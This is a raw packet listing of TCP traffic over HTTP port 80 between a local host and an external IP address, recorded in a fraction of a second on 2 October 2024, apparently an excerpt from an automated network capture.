Oct 2, 2024 09:41:04.803118944 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.803148985 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.803179979 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.803303957 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.835153103 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.835176945 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.835194111 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.835210085 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.835237026 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.835248947 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.835253954 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.835272074 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.835283041 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.835283041 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.835290909 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.835314989 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888061047 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888082027 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888109922 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888130903 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888138056 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888148069 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888151884 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888178110 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888195038 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888206005 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888211966 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888230085 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888262987 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888279915 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888289928 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888298035 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888314009 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888324976 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888329029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888346910 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888355017 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888437033 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888492107 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888509035 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888525009 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888541937 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888557911 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888569117 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888573885 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888591051 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888600111 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888605118 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888618946 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888622046 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888638973 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888648033 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888668060 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888684988 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888695002 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888700962 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888719082 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888727903 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888740063 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888757944 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888766050 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888953924 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888971090 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.888983011 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.888987064 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889004946 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889014006 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889022112 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889039040 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889048100 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889055967 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889071941 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889081955 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889089108 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889106035 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889116049 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889133930 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889149904 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889159918 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889166117 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889183998 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889192104 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889199018 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889215946 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889225006 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889234066 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889246941 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889257908 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889266014 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889297962 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889312029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889328957 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889338017 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889347076 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889363050 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889373064 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889377117 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889400005 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889403105 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889420033 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889434099 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889450073 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889468908 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889477015 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889651060 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889667034 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889679909 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889683008 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889699936 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889709949 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889718056 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889736891 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889745951 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889755011 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889781952 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889786959 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889803886 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889817953 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889833927 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889843941 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889849901 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889862061 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889868021 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889883041 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889894009 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889900923 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889915943 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889928102 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889935970 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.889961958 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.889986992 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890001059 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890016079 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890042067 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890047073 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890063047 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890077114 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890091896 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890093088 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890108109 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890115976 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890131950 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890141010 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890150070 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890162945 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890176058 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890181065 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890206099 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890213966 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890223026 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890239954 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890254974 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890274048 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890280008 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890377998 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890407085 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890408039 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890439987 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890467882 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890467882 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890512943 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890542984 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890542984 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890574932 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890604019 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890604973 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890638113 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890666962 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890667915 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890700102 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890728951 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890729904 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890763044 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890790939 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890791893 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890822887 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890852928 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890852928 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890885115 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890913963 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890913963 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890949011 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.890979052 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.890985966 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.891745090 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.923980951 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.924002886 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.924020052 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.924038887 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.924055099 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.924066067 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.924072027 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.924077988 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.924092054 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.924110889 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.924119949 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.927901983 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.975892067 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.975914955 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.975933075 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.975960970 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.975980997 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.975987911 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.976006985 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.976007938 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976027012 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976042986 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976059914 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976069927 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.976077080 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976087093 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.976094961 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976111889 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976124048 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.976129055 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976150036 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976154089 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.976506948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976532936 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.976533890 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976552963 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976568937 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976578951 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.976587057 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976613998 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.976681948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976824999 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.976843119 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977014065 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977030039 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977041006 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977046967 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977062941 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977072954 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977081060 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977097034 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977107048 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977113962 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977144003 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977169991 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977185965 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977195978 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977201939 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977217913 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977226973 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977235079 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977251053 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977262020 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977267027 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977292061 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977293968 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977313995 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977329969 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977340937 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977346897 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977361917 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977372885 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977416039 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977442026 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977442980 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977459908 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977485895 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977487087 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977505922 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977520943 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977530956 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977536917 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977551937 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977564096 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977571011 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977586031 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977596998 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977607012 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977621078 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977633953 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977638006 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977657080 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977667093 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977675915 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977691889 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977701902 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977709055 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977725983 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977735043 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977742910 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977760077 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977768898 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977787971 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977804899 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977814913 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977819920 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977835894 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977845907 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977854013 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977871895 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977880955 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977886915 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977912903 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977916002 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977936029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977950096 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977966070 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977967024 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.977982998 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.977998972 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978010893 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978015900 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978028059 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978048086 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978065968 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978074074 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978092909 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978111029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978120089 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978195906 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978213072 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978224039 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978229046 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978245020 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978254080 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978264093 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978290081 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978339911 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978358030 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978373051 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978384018 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978389025 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978415966 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978518963 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978537083 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978562117 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:04.978698969 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:04.978715897 CEST	80	49734	147.45.44.104	192.168.2.4
